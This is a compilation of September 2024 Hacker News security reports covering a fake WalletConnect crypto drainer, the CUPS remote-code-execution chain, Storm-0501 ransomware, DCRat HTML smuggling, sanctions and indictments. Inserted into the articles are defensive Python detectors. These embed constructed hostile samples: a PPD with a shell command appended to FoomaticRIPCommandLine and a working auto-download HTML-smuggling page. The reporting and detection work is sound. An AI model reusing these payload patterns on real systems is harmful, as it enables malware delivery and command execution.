Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign
28.9.24 Cryptocurrency The Hacker News
Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months.
The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it.
"Fake reviews and consistent branding helped the app achieve over 10,000 downloads by ranking high in search results," the cybersecurity company said in an analysis, adding it's the first time a cryptocurrency drainer has exclusively targeted mobile device users.
Over 150 users are estimated to have fallen victim to the scam, although it's believed that not all users who downloaded the app were impacted by the cryptocurrency drainer.
The campaign involved distributing a deceptive app that went by several names such as "Mestox Calculator," "WalletConnect - DeFi & NFTs," and "WalletConnect - Airdrop Wallet" (co.median.android.rxqnqb).
While the app is no longer available for download from the official app marketplace, data from SensorTower shows that it was popular in Nigeria, Portugal, and Ukraine, and linked to a developer named UNS LIS.
The developer has also been associated with another Android app called "Uniswap DeFI" (com.lis.uniswapconverter) that remained active on the Play Store for about a month between May and June 2023. It's currently not known if the app had any malicious functionality.
However, both apps can be downloaded from third-party app store sources, once again highlighting the risks posed by downloading APK files from other marketplaces.
Once installed, the fake WalletConnect app directs users to a website that checks their IP address and User-Agent string and, if they match the targeting criteria, redirects them a second time to another site that mimics Web3Inbox.
Users who don't meet the required criteria, including those who visit the URL from a desktop web browser, are taken to a legitimate website to evade detection, effectively allowing the threat actors to bypass the app review process in the Play Store.
Besides taking steps to prevent analysis and debugging, the core component of the malware is a cryptocurrency drainer known as MS Drainer, which prompts users to connect their wallet and sign several transactions to verify their wallet.
The information entered by the victim in each step is transmitted to a command-and-control server (cakeserver[.]online) that, in turn, sends back a response containing instructions to trigger malicious transactions on the device and transfer the funds to a wallet address belonging to the attackers.
"Similar to the theft of native cryptocurrency, the malicious app first tricks the user into signing a transaction in their wallet," Check Point researchers said.
"Through this transaction, the victim grants permission for the attacker's address 0xf721d710e7C27323CC0AeE847bA01147b0fb8dBF (the 'Address' field in the configuration) to transfer the maximum amount of the specified asset (if allowed by its smart contract)."
In the next step, the tokens from the victim's wallet are transferred to a different wallet (0xfac247a19Cc49dbA87130336d3fd8dc8b6b944e1) controlled by the attackers.
This also means that if the victim does not revoke the permission to withdraw tokens from their wallet, the attackers can keep withdrawing the digital assets as soon as they appear without requiring any further action.
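The approval-then-transfer pattern described above can be caught before the first signature is made. The following is an added example, not code from Check Point or the drainer: it decodes the calldata of an ERC-20 approve() call, flags an unlimited allowance to an untrusted spender (the attacker address quoted in the article is used as the sample spender), and builds the approve(spender, 0) call that revokes such an allowance. The trusted-spender list and the balance passed in are assumptions supplied by the caller.

```python
# Added example (not from the Check Point report): decode ERC-20 approve()
# calldata so a wallet-side or monitoring check can flag an unlimited allowance
# granted to an untrusted spender, and build the approve(spender, 0) call that
# revokes it. The sample calldata below is constructed.
from dataclasses import dataclass
from typing import Optional

# 4-byte selectors = first 4 bytes of keccak256(signature); these are the
# standard ERC-20 ones.
APPROVE_SELECTOR = "095ea7b3"          # approve(address,uint256)
TRANSFER_FROM_SELECTOR = "23b872dd"    # transferFrom(address,address,uint256)
MAX_UINT256 = 2**256 - 1

# Spender address quoted in the article (the drainer configuration's 'Address').
KNOWN_DRAINER_SPENDERS = {"0xf721d710e7c27323cc0aee847ba01147b0fb8dbf"}


@dataclass
class Approval:
    spender: str   # lower-case 0x-prefixed address
    amount: int    # allowance in the token's smallest unit


def decode_approve(calldata: str) -> Optional[Approval]:
    """Decode approve(address,uint256) calldata; None if it is not one."""
    data = calldata.lower()
    if data.startswith("0x"):
        data = data[2:]
    # selector (4 bytes) + two ABI-encoded 32-byte words = 68 bytes = 136 hex chars
    if len(data) != 136 or data[:8] != APPROVE_SELECTOR:
        return None
    spender_word, amount_word = data[8:72], data[72:136]
    # An address occupies the low 20 bytes of its word; the high 12 must be zero.
    if spender_word[:24] != "0" * 24:
        return None
    return Approval("0x" + spender_word[24:], int(amount_word, 16))


def approval_risks(calldata: str, trusted_spenders: set, balance: int) -> list:
    """Return the reasons an approve() request should be refused or warned about."""
    approval = decode_approve(calldata)
    if approval is None:
        return []  # not an approve() call; nothing to judge here
    reasons = []
    if approval.spender in KNOWN_DRAINER_SPENDERS:
        reasons.append("spender is a known drainer address")
    if approval.spender not in trusted_spenders:
        reasons.append("spender is not on the trusted contract list")
    if approval.amount == MAX_UINT256:
        reasons.append("unlimited allowance (max uint256)")
    elif approval.amount > balance:
        reasons.append("allowance exceeds current balance")
    return reasons


def build_revoke_calldata(spender: str) -> str:
    """approve(spender, 0): the standard way to revoke an existing allowance."""
    addr = spender.lower()
    if addr.startswith("0x"):
        addr = addr[2:]
    if len(addr) != 40 or any(c not in "0123456789abcdef" for c in addr):
        raise ValueError("spender must be a 20-byte hex address")
    return "0x" + APPROVE_SELECTOR + addr.rjust(64, "0") + "0" * 64


# Constructed sample: an approve() granting the article's attacker address an
# unlimited allowance, the shape of the first transaction the drainer requests.
SAMPLE_APPROVE_CALLDATA = (
    "0x" + APPROVE_SELECTOR
    + "f721d710e7c27323cc0aee847ba01147b0fb8dbf".rjust(64, "0")
    + "f" * 64
)

if __name__ == "__main__":
    for reason in approval_risks(SAMPLE_APPROVE_CALLDATA, {"0x" + "1" * 40}, 10**18):
        print("WARN:", reason)
    print("revoke:", build_revoke_calldata("0xf721d710e7C27323CC0AeE847bA01147b0fb8dBF"))
```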
Check Point said it also identified another malicious app exhibiting similar features "Walletconnect | Web3Inbox" (co.median.android.kaebpq) that was previously available on Google Play Store in February 2024. It attracted more than 5,000 downloads.
"This incident highlights the growing sophistication of cybercriminal tactics, particularly in the realm of decentralized finance, where users often rely on third-party tools and protocols to manage their digital assets," the company noted.
"The malicious app did not rely on traditional attack vectors like permissions or keylogging. Instead, it used smart contracts and deep links to silently drain assets once users were tricked into using the app."
U.S. Charges Three Iranian Nationals for Election Interference and Cybercrimes
28.9.24 BigBrothers The Hacker News
U.S. federal prosecutors on Friday unsealed criminal charges against three Iranian nationals who are allegedly employed with the Islamic Revolutionary Guard Corps (IRGC) for their targeting of current and former officials to steal sensitive data.
The Department of Justice (DoJ) accused Masoud Jalili, 36, Seyyed Ali Aghamiri, 34, and Yasar (Yaser) Balaghi, 37, of participating in a conspiracy with other known and unknown actors to undermine the U.S. electoral process.
They are alleged to have hacked into accounts of current and former U.S. officials, members of the media, nongovernmental organizations, and individuals associated with U.S. political campaigns. None of the three operatives, said to be members of the Basij Resistance Force, have been arrested.
"The activity was part of Iran's continuing efforts to stoke discord, erode confidence in the U.S. electoral process, and unlawfully acquire information relating to current and former U.S. officials that could be used to advance the malign activities of the IRGC, including ongoing efforts to avenge the death of Qasem Soleimani, the former commander of the IRGC – Qods Force (IRGC-QF)," the DoJ said.
The activity, per the DoJ, entailed obtaining access to non-public campaign documents and emails related to the election campaign sometime around May 2024. Then the next month, the conspirators engaged in hack-and-leak operations by sharing the stolen campaign material with media publications and individuals associated with the other presidential campaign.
The development comes nearly two weeks after the U.S. Federal Bureau of Investigation (FBI) blamed Iranian threat actors for plundering non-public material from former President Trump's campaign and passing it on to President Biden's campaign and U.S. media organizations.
"These hack-and-leak efforts by Iran are a direct assault on the integrity of our democratic processes," said Assistant Attorney General Matthew G. Olsen of the Justice Department's National Security Division.
"Iranian government actors have long sought to use cyber-enabled means to harm U.S. interests. This case demonstrates our commitment to expose attempts by the Iranian regime or any other foreign actor to interfere with our free and open society."
Jalili, Aghamiri, and Balaghi have also been accused of undertaking a wide-ranging hacking campaign starting back in January 2020 to infiltrate victims' computers and online accounts using a combination of spear-phishing and social engineering techniques.
This involved the use of fake personas to trick users into clicking on malicious links and spoofing login pages to harvest account credentials and using the compromised victim accounts to send phishing messages to other targets. The DoJ said some of these efforts were successful.
The trio have been charged with 18 counts that include conspiracy to commit identity theft, aggravated identity theft, access device fraud, unauthorized access to computers to obtain information from a protected computer, unauthorized access to computers to defraud and obtain a thing of value, and wire fraud.
In coordination with the indictment, the Department of State has issued a reward of up to $10 million for information on Jalili, Aghamiri, and Balaghi, the IRGC's interference in U.S. elections, or associated individuals and entities.
The U.S. Department of the Treasury's Office of Foreign Asset Control (OFAC) has imposed sanctions against seven individuals for their malicious cyber activities, including spear-phishing, hack-and-leak operations, and their alleged interference with political campaigns -
Masoud Jalili
Ali Mahdavian, Fatemeh Sadeghi, Elaheh Yazdi, Sayyed Mehdi Rahimi Hajjiabadi, Mohammad Hosein Abdolrahimi, and Rahmatollah Askarizadeh (employees and executives of Emennet Pasargad)
It's worth noting that the U.S. government previously sanctioned six other employees of the same company in November 2021 for their attempts to interfere in the 2020 U.S. presidential election.
"The Iranian regime is increasingly attempting to influence the outcome of the forthcoming U.S. election because it perceives the outcome will impact U.S. foreign policy towards Iran," the State Department said.
"Iranian state-sponsored actors have undertaken a variety of malicious cyber activities, such as hack-and-leak operations and spear-phishing, in an attempt to undermine confidence in the United States' election processes and institutions while also seeking to influence the political campaigns."
In August, Iran denied accusations that it played any role in the hack, calling them baseless and stating that Iran's "cyber power is defensive and proportionate to the threats it faces," Iran's state-controlled news agency IRNA reported.
The indictment is the latest effort by the U.S. government to counter foreign efforts to interfere in the upcoming election. Recently, it also brought criminal charges and sanctions against employees of Russian state media outlet RT for allegedly funding pro-Trump social-media influencers in the U.S.
Progress Software Releases Patches for 6 Flaws in WhatsUp Gold – Patch Now
28.9.24 Vulnerability The Hacker News
Progress Software has released another round of updates to address six security flaws in WhatsUp Gold, including two critical vulnerabilities.
The issues, the company said, have been resolved in version 24.0.1 released on September 20, 2024. The company has yet to release any details about what the flaws are other than listing their CVE identifiers -
CVE-2024-46905 (CVSS score: 8.8)
CVE-2024-46906 (CVSS score: 8.8)
CVE-2024-46907 (CVSS score: 8.8)
CVE-2024-46908 (CVSS score: 8.8)
CVE-2024-46909 (CVSS score: 9.8), and
CVE-2024-8785 (CVSS score: 9.8)
Security researcher Sina Kheirkhah of Summoning Team has been credited with discovering and reporting the first four flaws. Andy Niu of Trend Micro has been acknowledged for CVE-2024-46909, while Tenable has been credited for CVE-2024-8785.
It's worth noting that Trend Micro recently reported that threat actors are actively exploiting proof-of-concept (PoC) exploits for other recently disclosed security flaws in WhatsUp Gold to conduct opportunistic attacks.
Previously, the Shadowserver Foundation said it had observed exploitation attempts against CVE-2024-4885 (CVSS score: 9.8), another critical bug in WhatsUp Gold that was resolved by Progress in June 2024.
WhatsUp Gold customers are recommended to apply the latest fixes as soon as possible to mitigate potential threats.
Critical Linux CUPS Printing System Flaws Could Allow Remote Command Execution
27.9.24 Vulnerability The Hacker News
A new set of security vulnerabilities has been disclosed in the OpenPrinting Common Unix Printing System (CUPS) on Linux systems that could permit remote command execution under certain conditions.
"A remote unauthenticated attacker can silently replace existing printers' (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer)," security researcher Simone Margaritelli said.
CUPS is a standards-based, open-source printing system for Linux and other Unix-like operating systems, including ArchLinux, Debian, Fedora, Red Hat Enterprise Linux (RHEL), ChromeOS, FreeBSD, NetBSD, OpenBSD, openSUSE, and SUSE Linux.
The list of vulnerabilities is as follows -
CVE-2024-47176 - cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL
CVE-2024-47076 - libcupsfilters <= 2.1b1 cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker-controlled data to the rest of the CUPS system
CVE-2024-47175 - libppd <= 2.1b1 ppdCreatePPDFromIPP2 does not validate or sanitize the IPP attributes when writing them to a temporary PPD file, allowing the injection of attacker-controlled data in the resulting PPD
CVE-2024-47177 - cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter
A net consequence of these shortcomings is that they could be fashioned into an exploit chain that allows an attacker to create a malicious, fake printing device on a network-exposed Linux system running CUPS and trigger remote code execution upon sending a print job.
"The issue arises due to improper handling of 'New Printer Available' announcements in the 'cups-browsed' component, combined with poor validation by 'cups' of the information provided by a malicious printing resource," network security company Ontinue said.
"The vulnerability stems from inadequate validation of network data, allowing attackers to get the vulnerable system to install a malicious printer driver, and then send a print job to that driver triggering execution of the malicious code. The malicious code is executed with the privileges of the lp user – not the superuser 'root.'"
RHEL, in an advisory, said all versions of the operating system are affected by the four flaws, but noted that they are not vulnerable in their default configuration. It tagged the issues as Important in severity, given that the real-world impact is likely to be low.
"By chaining this group of vulnerabilities together, an attacker could potentially achieve remote code execution which could then lead to theft of sensitive data and/or damage to critical production systems," it said.
Cybersecurity firm Rapid7 pointed out that affected systems are exploitable, either from the public internet or across network segments, only if UDP port 631 is accessible and the vulnerable service is listening.
Palo Alto Networks has disclosed that none of its products and cloud services contain the aforementioned CUPS-related software packages, and therefore are not impacted by the flaws.
Patches for the vulnerabilities are currently being developed and are expected to be released in the coming days. Until then, it's advisable to disable and remove the cups-browsed service if it's not necessary, and block or restrict traffic to UDP port 631.
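Because the chain ends with foomatic-rip executing whatever FoomaticRIPCommandLine a PPD carries (CVE-2024-47175 and CVE-2024-47177 above), one useful check while patches are pending is to audit the PPDs CUPS has installed. The following is an added example, not code from the advisory or the CUPS project: a small PPD parser that flags FoomaticRIPCommandLine entries, grading any with shell control characters as high, and notes printers whose filter chain runs foomatic-rip at all. The PPD directory default and the sample PPD are assumptions constructed for the example.

```python
# Added example (not from the advisory or the CUPS project): audit PPD files for
# the FoomaticRIPCommandLine entries foomatic-rip executes, and note printers
# whose cupsFilter chain runs foomatic-rip. The sample PPD is constructed.
import re
from dataclasses import dataclass
from pathlib import Path

# Shell control characters that have no business in a RIP command line.
SHELL_CONTROL = re.compile(r"[;|&`]|\$\(|\$\{")


@dataclass
class Finding:
    keyword: str
    severity: str   # "high", "medium" or "info"
    detail: str


def parse_ppd(text: str) -> list:
    """Return (keyword, value) pairs. Quoted values may span several lines,
    which is how long FoomaticRIPCommandLine entries are usually written."""
    entries, lines, i = [], text.splitlines(), 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line.startswith("*") or line.startswith("*%") or ":" not in line:
            continue  # comment, blank, or not a keyword line
        head, value = line[1:].split(":", 1)
        keyword = head.split()[0] if head.split() else ""
        value = value.strip()
        if value.startswith('"'):
            body = value[1:]
            while '"' not in body and i < len(lines):  # read up to the closing quote
                body += "\n" + lines[i]
                i += 1
            value = body.split('"', 1)[0]
        entries.append((keyword, value))
    return entries


def audit_ppd(text: str) -> list:
    findings = []
    for keyword, value in parse_ppd(text):
        if keyword == "FoomaticRIPCommandLine":
            # Foomatic PPDs continue long command lines with a trailing "&&";
            # drop that before looking for real shell control characters.
            cmd = re.sub(r"&&\s*\n\s*", " ", value)
            if SHELL_CONTROL.search(cmd):
                findings.append(Finding(keyword, "high",
                    "command line contains shell control characters: " + cmd))
            else:
                findings.append(Finding(keyword, "medium",
                    "foomatic-rip command line present; confirm it matches the vendor PPD"))
        elif keyword.startswith("cupsFilter") and "foomatic-rip" in value:
            findings.append(Finding(keyword, "info",
                "print jobs pass through foomatic-rip, which honours FoomaticRIPCommandLine"))
    return findings


def audit_ppd_dir(directory: str = "/etc/cups/ppd") -> dict:
    """Audit every installed PPD; keys are file names, values are findings."""
    results = {}
    for ppd in sorted(Path(directory).glob("*.ppd")):
        findings = audit_ppd(ppd.read_text(errors="replace"))
        if findings:
            results[ppd.name] = findings
    return results


# Constructed sample: a PPD whose RIP command line has had a second command
# appended after the legitimate Ghostscript invocation.
SAMPLE_PPD = """\
*PPD-Adobe: "4.3"
*% Constructed sample for this example, not a vendor file
*ModelName: "Example Printer"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dNOPAUSE -sDEVICE=pxlmono &&
-sOutputFile=- - ; echo injected"
*DefaultPageSize: Letter
"""

if __name__ == "__main__":
    for f in audit_ppd(SAMPLE_PPD):
        print(f"[{f.severity}] *{f.keyword}: {f.detail}")
```

Run audit_ppd_dir() on a host to review every installed PPD; a "medium" finding on a printer you installed from a vendor PPD is expected, while a "high" one or a printer you did not install warrants a closer look.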
"It looks like the embargoed Linux unauth RCE vulnerabilities that have been touted as doomsday for Linux systems, may only affect a subset of systems," Benjamin Harris, CEO of WatchTowr, said in a statement shared with The Hacker News.
"Given this, while the vulnerabilities in terms of technical impact are serious, it is significantly less likely that desktop machines/workstations running CUPS are exposed to the Internet in the same manner or numbers that typical server editions of Linux would be."
Satnam Narang, senior staff research engineer at Tenable, said these vulnerabilities are not at a level of a Log4Shell or Heartbleed.
"The reality is that across a variety of software, be it open or closed source, there are a countless number of vulnerabilities that have yet to be discovered and disclosed," Narang said. "Security research is vital to this process and we can and should demand better of software vendors."
"For organizations that are honing in on these latest vulnerabilities, it's important to highlight that the flaws that are most impactful and concerning are the known vulnerabilities that continue to be exploited by advanced persistent threat groups with ties to nation states, as well as ransomware affiliates that are pilfering corporations for millions of dollars each year."
Microsoft Identifies Storm-0501 as Major Threat in Hybrid Cloud Ransomware Attacks
27.9.24 APT The Hacker News
The threat actor known as Storm-0501 has targeted government, manufacturing, transportation, and law enforcement sectors in the U.S. to stage ransomware attacks.
The multi-stage attack campaign is designed to compromise hybrid cloud environments and perform lateral movement from on-premises to cloud environment, ultimately resulting in data exfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment, Microsoft said.
"Storm-0501 is a financially motivated cybercriminal group that uses commodity and open-source tools to conduct ransomware operations," according to the tech giant's threat intelligence team.
Active since 2021, the threat actor has a history of targeting education entities with Sabbath (54bb47h) ransomware before evolving into a ransomware-as-a-service (RaaS) affiliate delivering various ransomware payloads over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and Embargo ransomware.
A notable aspect of Storm-0501's attacks is the use of weak credentials and over-privileged accounts to move from organizations on-premises to cloud infrastructure.
Other initial access methods include using a foothold already established by access brokers like Storm-0249 and Storm-0900, or exploiting various known remote code execution vulnerabilities in unpatched internet-facing servers such as Zoho ManageEngine, Citrix NetScaler, and Adobe ColdFusion 2016.
The access afforded by any of the aforementioned approaches paves the way for extensive discovery operations to determine high-value assets, gather domain information, and perform Active Directory reconnaissance. This is followed by the deployment of remote monitoring and management tools (RMMs) like AnyDesk to maintain persistence.
"The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods," Microsoft said.
"The threat actor primarily utilized Impacket's SecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices to obtain credentials."
The compromised credentials are then used to access even more devices and extract additional credentials, with the threat actor simultaneously accessing sensitive files to extract KeePass secrets and conducting brute-force attacks to obtain credentials for specific accounts.
Microsoft said it detected Storm-0501 employing Cobalt Strike to move laterally across the network using the compromised credentials and send follow-on commands. Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.
The threat actor has also been observed creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises environment, making it the latest threat actor to target hybrid cloud setups after Octo Tempest and Manatee Tempest.
"The threat actor used the credentials, specifically Microsoft Entra ID (formerly Azure AD), that were stolen from earlier in the attack to move laterally from the on-premises to the cloud environment and establish persistent access to the target network through a backdoor," Redmond said.
The pivot to the cloud is said to be accomplished either through a compromised Microsoft Entra Connect Sync user account or via cloud session hijacking of an on-premises user account that has a respective admin account in the cloud with multi-factor authentication (MFA) disabled.
The attack culminates with the deployment of Embargo ransomware across the victim organization upon obtaining sufficient control over the network, exfiltrating files of interest, and lateral movement to the cloud. Embargo is a Rust-based ransomware first discovered in May 2024.
"Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom," Microsoft said.
"Embargo affiliates employ double extortion tactics, where they first encrypt a victim's files and threaten to leak stolen sensitive data unless a ransom is paid."
The disclosure comes as the DragonForce ransomware group has been targeting companies in manufacturing, real estate, and transportation sectors using a variant of the leaked LockBit3.0 builder and a modified version of Conti.
The attacks are characterized by the use of the SystemBC backdoor for persistence, Mimikatz and Cobalt Strike for credential harvesting, and Cobalt Strike for lateral movement. The U.S. accounts for more than 50% of the total victims, followed by the U.K. and Australia.
"The group employs double extortion tactics, encrypting data, and threatening leaks unless a ransom is paid," Singapore-headquartered Group-IB said. "The affiliate program, launched on 26 June 2024, offers 80% of the ransom to affiliates, along with tools for attack management and automation."
New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users
27.9.24 Hacking The Hacker News
Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling.
The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF attachments or macro-laced Microsoft Excel documents.
"HTML smuggling is primarily a payload delivery mechanism," Netskope researcher Nikhil Hegde said in an analysis published Thursday. "The payload can be embedded within the HTML itself or retrieved from a remote resource."
The HTML file, in turn, can be propagated via bogus sites or malspam campaigns. Once the file is launched via the victim's web browser, the concealed payload is decoded and downloaded onto the machine.
The attack subsequently banks on some level of social engineering to convince the victim to open the malicious payload.
Netskope said it discovered HTML pages mimicking TrueConf and VK in the Russian language that when opened in a web browser, automatically download a password-protected ZIP archive to disk in an attempt to evade detection. The ZIP payload contains a nested RarSFX archive that ultimately leads to the deployment of the DCRat malware.
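A triage script for the delivery mechanism described above, added here as an example and not taken from the Netskope write-up: it looks for an embedded base64 payload together with the browser-side decode-and-download pattern (atob, Blob, object URL, download attribute, automatic click), decodes the payload offline and identifies the carried file type from its magic bytes. The sample HTML and its payload are constructed; the payload is only a ZIP header followed by zero bytes.

```python
# Added example (not from the Netskope write-up): heuristic triage of an HTML
# file for the smuggling pattern, plus offline identification of the embedded
# payload's file type. Sample HTML and payload are constructed.
import base64
import re
from dataclasses import dataclass, field

# Script-side behaviours that together make up the smuggling chain.
INDICATOR_PATTERNS = {
    "base64-decode": re.compile(r"\batob\s*\("),
    "blob-object": re.compile(r"new\s+Blob\s*\("),
    "object-url": re.compile(r"URL\.createObjectURL\s*\(|msSaveOrOpenBlob"),
    "download-attr": re.compile(r"\.download\s*=|\bdownload\s*="),
    "auto-click": re.compile(r"\.click\s*\(\s*\)"),
}
ARCHIVE_NAME = re.compile(r"""["']([^"']+\.(?:zip|rar|iso|img|7z))["']""", re.I)
# A quoted base64 literal long enough to be a file rather than a token.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{64,}={0,2})["']""")

MAGIC = {
    b"PK\x03\x04": "zip",
    b"Rar!\x1a\x07": "rar",
    b"MZ": "pe-executable",
    b"%PDF": "pdf",
}


@dataclass
class Report:
    indicators: list = field(default_factory=list)
    archive_names: list = field(default_factory=list)
    payload_types: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Decode + download of an embedded file is the minimum working chain.
        chain = {"base64-decode", "download-attr"} <= set(self.indicators)
        return chain and bool(self.payload_types)


def identify_payload(data: bytes) -> str:
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def analyze_html(html: str) -> Report:
    report = Report()
    for name, pattern in INDICATOR_PATTERNS.items():
        if pattern.search(html):
            report.indicators.append(name)
    report.archive_names = [m.group(1) for m in ARCHIVE_NAME.finditer(html)]
    for literal in B64_LITERAL.findall(html):
        try:
            decoded = base64.b64decode(literal, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        report.payload_types.append(identify_payload(decoded))
    return report


# Constructed sample: a page styled after the lure described in the article,
# carrying a harmless 64-byte "archive" (ZIP header + zeros) as its payload.
SAMPLE_PAYLOAD_B64 = base64.b64encode(b"PK\x03\x04" + bytes(60)).decode()
SAMPLE_HTML = f"""<html><body><h1>TrueConf</h1>
<script>
var data = "{SAMPLE_PAYLOAD_B64}";
var bytes = Uint8Array.from(atob(data), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "TrueConf_setup.zip";
document.body.appendChild(a);
a.click();
</script></body></html>"""

if __name__ == "__main__":
    rep = analyze_html(SAMPLE_HTML)
    print("suspicious:", rep.suspicious)
    print("indicators:", rep.indicators)
    print("archive names:", rep.archive_names, "payload types:", rep.payload_types)
```

Attackers split or obfuscate the base64 string to defeat exactly this kind of literal match, so treat a clean result as inconclusive and the indicator list as a starting point for sandbox detonation.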
First released in 2018, DCRat is capable of functioning as a full-fledged backdoor that can be paired with additional plugins to extend its functionality. It can execute shell commands, log keystrokes, and exfiltrate files and credentials, among others.
Organizations are recommended to review HTTP and HTTPS traffic to ensure that systems are not communicating with malicious domains.
The development comes as Russian companies have been targeted by a threat cluster dubbed Stone Wolf to infect them with Meduza Stealer by sending phishing emails masquerading as a legitimate provider of industrial automation solutions.
"Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim," BI.ZONE said. "By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments."
It also follows the emergence of malicious campaigns that have likely leveraged generative artificial intelligence (GenAI) to write VBScript and JavaScript code responsible for spreading AsyncRAT via HTML smuggling.
"The scripts' structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," HP Wolf Security said. "The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints."
U.S. Sanctions Two Crypto Exchanges for Facilitating Cybercrime and Money Laundering
27.9.24 Cryptocurrency The Hacker News
The U.S. government on Thursday sanctioned two cryptocurrency exchanges and unsealed an indictment against a Russian national for his alleged involvement in the operation of several money laundering services that were offered to cybercriminals.
The virtual currency exchanges, Cryptex and PM2BTC, have been alleged to facilitate the laundering of cryptocurrencies possibly obtained through cybercrime.
The coordinated action was carried out in collaboration with the Netherlands Police and the Dutch Fiscal Intelligence and Investigation Service (FIOD) as part of an ongoing law enforcement crackdown called Operation Endgame.
Pursuant to the exercise, the websites associated with both the exchanges have been confiscated and replaced with a law enforcement seizure banner. Furthermore, it has led to the seizure of cryptocurrency worth €7 million ($7.8 million).
"The United States and our international partners remain resolute in our commitment to prevent cybercrime facilitators like PM2BTC and Cryptex from operating with impunity," said Acting Under Secretary of the Treasury for Terrorism and Financial Intelligence Bradley T. Smith.
"Treasury, in close coordination with our allies and partners, will continue to use all tools and authorities to disrupt the networks that seek to leverage the virtual assets ecosystem to facilitate their illicit activities."
PM2BTC ("btc2pm[.]me"), the Treasury said, facilitated the laundering of convertible virtual currency (CVC) associated with ransomware and other illicit actors operating in Russia. It has been operational since 2014.
It's also said to have provided direct CVC-to-ruble exchange services, while failing to implement effective anti-money laundering (AML) and Know Your Customer (KYC) programs as required by U.S. federal law.
"PM2BTC facilitates a substantially greater proportion of transactions with apparent links to money laundering activity in connection with Russian illicit finance as compared to 99 percent of other virtual asset service providers," it said. "PM2BTC employs an unusual obfuscation that inhibits attribution of transactions to illicit activity and actors."
Cryptex ("Cryptex[.]net"), in a similar vein, has been accused of advertising virtual currency services directly to cybercriminals, receiving over $51.2 million in illicit proceeds derived from ransomware attacks. It further claimed "complete anonymity" when registering for an account.
It is also estimated to have received no less than $720 million in transactions linked to illegal services used by Russia-based ransomware actors and cybercriminals, including fraud shops, mixing services, exchanges lacking KYC programs, and the now-sanctioned virtual currency exchange Garantex.
A 44-year-old Russian national, Sergey Sergeevich Ivanov (aka UAPS or TALEON), has been charged for his role as a professional cyber money launderer for nearly two decades, and for providing his services, counting Cryptex and PM2BTC, to other e-crime groups and drug traffickers.
Ivanov's other charges include payment processing support to the carding website Rescator and laundering the illegal funds originating from Joker's Stash, another popular carding forum that voluntarily shut down its operations in February 2021.
Two such payment processing services are PinPays and UAPS ("uaps[.]so"), which stands for Universal Anonymous Payment System and has facilitated payments for several fraud shops like Genesis Market, BriansClub/Brian Dumps, and Faceless, per Chainalysis.
"UAPS and Cryptex have processed over $7.5 billion worth of transactions since their inception in 2013 and 2018, respectively," the blockchain analytics company noted.
Elliptic, another blockchain intelligence firm, said it's aware of "thousands of additional addresses" connected to Cryptex, PM2BTC, PinPays, and Joker's Stash, outside of the four cryptoasset addresses listed by the Treasury as tied to Cryptex.
A second Russian national, Timur Shakhmametov, 38, has also been charged with operating Joker's Stash and laundering its proceeds. The carding marketplace offered for sale data from nearly 40 million payment cards annually, and it's believed that the service netted the threat actors anywhere between $280 million to more than $1 billion in profits.
Concurrent with the actions, the U.S. Department of State has announced rewards of up to $10 million each for information leading to the arrests and/or convictions of Timur Shakhmametov and Sergey Ivanov.
An additional $1 million is also up for grabs for providing information leading to the identification of other key members linked to UAPS, PM2BTC, PinPays, and Joker's Stash.
"One of the most critical tactics in disrupting illicit actors is to disrupt the infrastructure they abuse to facilitate money laundering and other transnational cybercrime," Chainalysis said.
"Today's actions represent [Office of Foreign Assets Control's] continued efforts to work with key international partners to make the internet a safer place by shutting down fraudulent services and the infrastructure that hosts them."
Critical NVIDIA Container Toolkit Vulnerability Could Grant Full Host Access to Attackers
27.9.24 Vulnerability The Hacker News
A critical security flaw has been disclosed in the NVIDIA Container Toolkit that, if successfully exploited, could allow threat actors to break out of the confines of a container and gain full access to the underlying host.
The vulnerability, tracked as CVE-2024-0132, carries a CVSS score of 9.0 out of a maximum of 10.0. It has been addressed in NVIDIA Container Toolkit version v1.16.2 and NVIDIA GPU Operator version 24.6.2.
"NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system," NVIDIA said in an advisory.
"A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering."
The issue impacts all versions of NVIDIA Container Toolkit up to and including v1.16.1, and Nvidia GPU Operator up to and including 24.6.1. However, it does not affect use cases where Container Device Interface (CDI) is used.
